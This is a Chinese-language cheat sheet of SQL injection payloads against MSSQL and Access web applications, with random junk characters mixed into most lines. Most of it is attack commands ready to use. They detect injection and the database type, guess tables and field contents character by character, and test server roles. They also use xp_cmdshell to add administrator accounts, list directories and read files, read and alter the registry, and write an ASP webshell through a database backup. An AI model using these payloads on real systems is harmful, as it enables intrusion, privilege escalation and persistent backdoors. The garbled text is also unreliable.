1.判断是否有注入;and 1=1 ;and 1=2 H"2,Q
T
2.初步判断是否是mssql ;and user>0 q93V'[)F
EVbDI yFn
3.注入参数是字符'and [查询条件] and ''=' >>=v`}
z_z'3d.r7
4.搜索时没过滤参数的'and [查询条件] and '%25'=' q#Ik3 5
m :]F&s
5.判断数据库系统 QkO4Td<
7G_lGV_
;and (select count(*) from sysobjects)>0 mssql Aca?C
{Z[kvXf"mZ
;and (select count(*) from msysobjects)>0 access ):Ekf2
`k08M)
RWn#"~
MpJx>0j/J
6.猜数据库 ;and (select Count(*) from [数据库名])>0 r1$x}I#Zv
?
5hwz
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 bHHR^*B
x1:1Jj:
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 m(WVxVB
=E8Kacu%
9.(1)猜字段的ascii值(access) `"bp-/
[{_K[5i
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 1+Y;
"tT
8ZO~=e
(2)猜字段的ascii值(mssql) Z?w=-
UX'tdB
!A
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 E95VR?nUg
?Ye%k
10.测试权限结构(mssql) WF<*rl
+Nka,C^O"
sM%.=~AN
cACnBgLl
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- zU};|Zw
=iPQ\_ON@
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));--
2f -Or/v
cuQ=bRIb
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- z.kBQ{P
%M05& <
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- {|@N~c+
>[g'i+{
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- niM(0p
t]pJt
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- :SpPT
d _koF-7
;and 1=(select IS_MEMBER('db_owner'));-- SCMZ-^b
`3F/7$q_
;V1e>?3
)i>T\B
11.添加mssql和系统的帐户 rHgrCMW
N" oJ3-~
;exec master.dbo.sp_addlogin username;-- DzCb'#
;exec master.dbo.sp_password null,username,password;-- ymyk.#Z<%
|n&EbOmgf
;exec master.dbo.sp_addsrvrolemember sysadmin username;-- ^kj%Ekt7
6~q"#94
;exec master.dbo.xp_cmdshell 'net user username password H\e<fi%Q
QgX[?2
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- rkWW)h(e
I~Zm**L
;exec master.dbo.xp_cmdshell 'net user username password /add';-- BH=CoD.
h'G8@j;
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';--
'+C%]p
-3:x(^|:K
YcBAW4B`
rx;zd ?
12.(1)遍历目录 k$} 6Qd
ZsYT&P2
;create table dirs(paths varchar(100), id int) x68s$H
[p_C?hHO
;insert dirs exec master.dbo.xp_dirtree 'c:\' (*Y ENT}
rhvsd2zi
;and (select top 1 paths from dirs)>0 N
DV_/BI
S>p>$m,
Q
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) -^7n+
QX
uc;QSVWGy8
_qqJ>E<0
.c.#V:XZ#U
(2)遍历目录 ;rH@>VrR
pF"IDC
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- |4a#O8d
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 lL:J:
c^8y/wfok
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 7e&%R4{b
v<Ux+-
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 [t`QV2um
[VP~~*b
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 3^zOG2
%@FTg$
hYN b9^
ysiBru[u
13.mssql中的存储过程 Gwkp(9d
vd<"
G}
xp_regenumvalues 注册表根键, 子键 Ws`P(WHm
,*Yu~4
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 07+Qai-]
<kmn3w,vi
xp_regread 根键,子键,键值名 w~g)Dz2G
r
yO\$m
;exec xp_regread 6y9#am?
F
'U Gp
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 @YTZnGG*
Io&F0~Z;;(
xp_regwrite 根键,子键, 值名, 值类型, 值 j7 D\O
zW^@\kB0D
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 NUH#
9_GR\\
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 cv["Ps#;`W
YX_p3
xp_regdeletevalue 根键,子键,值名 wy$9QN
lH ^[b[
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 Pw'3ya8
.gWYKZM
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 5A6d]
PGHl:4`Es!
6l>$N?a
?J~(qa a;
14.mssql的backup创建webshell 7m=tu?@
HLU'1As65
use model JQ8wL _C>
X}xy
v
create table cmd(str image); /%U+kW
a ^b_&}y
insert into cmd(str) values (''); !285=cxz
wvA@\-.+
backup database model to disk='c:\l.asp'; kGMI
?
7PZ0
i9oi}$;J
pVt8z|p_;{
15.mssql内置函数 Hay`lA2@
?t+Kp9@aZ
;and (select @@version)>0 获得Windows的版本号 >_]j{}~\k
vd9><W
;and user_name()='dbo' 判断当前系统的连接用户是不是sa /nRi19a%xU
>T4.mB7+>
;and (select user_name())>0 爆当前系统的连接用户 snV,rZ
s7<x~v+^
;and (select db_name())>0 得到当前连接的数据库 N$H0o+9-Y
AjK'P<:/
g#1_`gK
969*mcq'
16.简洁的webshell _*+ 7*vAL
PK5xnT:
use model w7]@QTC
Z!m0nx
create table cmd(str image); D`LcL|nmH
,.uPlnB_
insert into cmd(str) values (''); 4*_9Gl
M
yr [
backup database model to disk='g:\wwwtest\l.asp';